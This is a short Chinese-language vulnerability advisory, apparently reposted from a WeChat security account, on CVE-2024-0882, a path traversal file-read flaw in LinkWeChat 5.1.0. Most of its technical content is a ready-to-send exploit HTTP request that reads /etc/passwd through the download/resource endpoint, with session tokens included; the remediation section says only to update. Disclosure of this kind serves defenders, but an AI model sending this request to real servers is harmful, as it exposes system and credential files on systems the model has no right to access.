0x01 前言
LinkWeChat 是基于企业微信的开源 SCRM 系统,是企业私域流量管理与营销的综合解决方案。不仅集成了企微强大的后台管理及基础的客户管理功能,而且提供了多种渠道、多个方式连接微信客户。主要运用于电商、零售、教育、金融、政务等服务行业领域化。
该系统存在任意文件读取漏洞,使用输入 /profile/../../../../../etc/passwd 操作参数名称会导致路径遍历,可以远程发起攻击。
0x02 影响版本
LinkWechat 5.1.00x03 漏洞复现
EXP如下:(需登录)
GET /linkwechat-api/common/download/resource?name=/profile/../../../../../etc/passwd HTTP/1.1Host: ip:portCookie: Admin-Token=eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiMGFmOWI2NGItZjMxMi00ZTQ1LTgzZTgtZjE4ODAzODkyNWQyIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.XqbboaMctCUvviPeEwcMv7a2E3D288Prm9hQ2r8dizdadRaV4R-ldDXlYoHiitL-YfDq9V43CQ6TpMsc1MbH9QSec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"Accept: application/json, text/plain, */*Sec-Ch-Ua-Mobile: ?0Authorization: Bearer eyJhbGciOiJIUzUxMiJ9.eyJ1c2VyX3R5cGUiOiIwMyIsInVzZXJfaWQiOjE2OCwibG9naW5fdHlwZSI6IkxpbmtXZUNoYXRBUEkiLCJ1c2VyX25hbWUiOiJsdyIsInVzZXJfa2V5IjoiMGFmOWI2NGItZjMxMi00ZTQ1LTgzZTgtZjE4ODAzODkyNWQyIiwiY29ycF9uYW1lIjoi5Luf5b6u56eR5oqAIiwiY29ycF9pZCI6Ind3NjIyZmM4NTJmNzljM2YxMyJ9.XqbboaMctCUvviPeEwcMv7a2E3D288Prm9hQ2r8dizdadRaV4R-ldDXlYoHiitL-YfDq9V43CQ6TpMsc1MbH9QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Sec-Ch-Ua-Platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://127.0.0.1/login?redirect=/Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9X-Forwarded-For: 127.0.0.1Connection: close
发送该请求,如下利用成功!
0x04 修复方案
建议及时更新 
原文始发于微信公众号(EchoSec):CVE-2024-0882 漏洞(附EXP)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论